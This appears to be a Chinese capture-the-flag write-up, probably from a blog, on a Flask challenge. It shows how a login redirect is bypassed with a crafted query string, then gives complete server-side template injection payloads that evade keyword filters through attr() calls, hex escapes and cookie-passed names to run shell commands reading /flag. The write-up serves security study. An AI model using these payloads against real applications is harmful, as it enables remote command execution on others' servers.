0x00 前言
补充flask基础知识
贴文档
request.full_path
Requested path as unicode, including the query string.
包含查询字符串的请求路径
直观一点
0x01 复现
注释带hint
<div class="center-content error">
<h3>you need login</h3>
<!--/admin-->
<!--/static.js-->
<!--if not request.full_path.endswith(".js?"):
if not request.full_path.startswith("/login"):
return redirect("login")-->
</div>
进/admin 并绕过重定向
dbq…太菜了那时没想着加参数就能过
/admin?a=.js?
hello admin
<!--admin/?name=-->
payload test
存在ssti
常规payload被ban了
fuzz一下看看过滤
目测过滤的有
- []
- __
后面知道subclasses也被ban了
学一下ssti进阶 羽师傅🐂👃
https://blog.youkuaiyun.com/miuzzx/article/details/110220425
想一下 attr+hex编码可以绕过
用getitem索引
ssti命令执行总结
https://blog.youkuaiyun.com/chizhaji/article/details/113834092
payload
记得空格换+号
/admin?name={{()|attr("\x5f\x5fclass\x5f\x5f")|attr("\x5f\x5fbase\x5f\x5f")|attr("\x5f\x5fsub"+"classes\x5f\x5f")()|attr("\x5f\x5fgetitem\x5f\x5f")(118)|attr("\x5f\x5finit\x5f\x5f")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")('popen')('cat+/flag')|attr("read")()}}&a=.js?
另解
看很多dl都用request.cookie.xx + cookie传参
eg:原始payload
?name={{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}
绕过payload+Cookie:
?name={{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}
x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()
参考
https://blog.youkuaiyun.com/chizhaji/article/details/113834092
https://blog.youkuaiyun.com/miuzzx/article/details/110220425
0x02 Rethink
争取多练
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
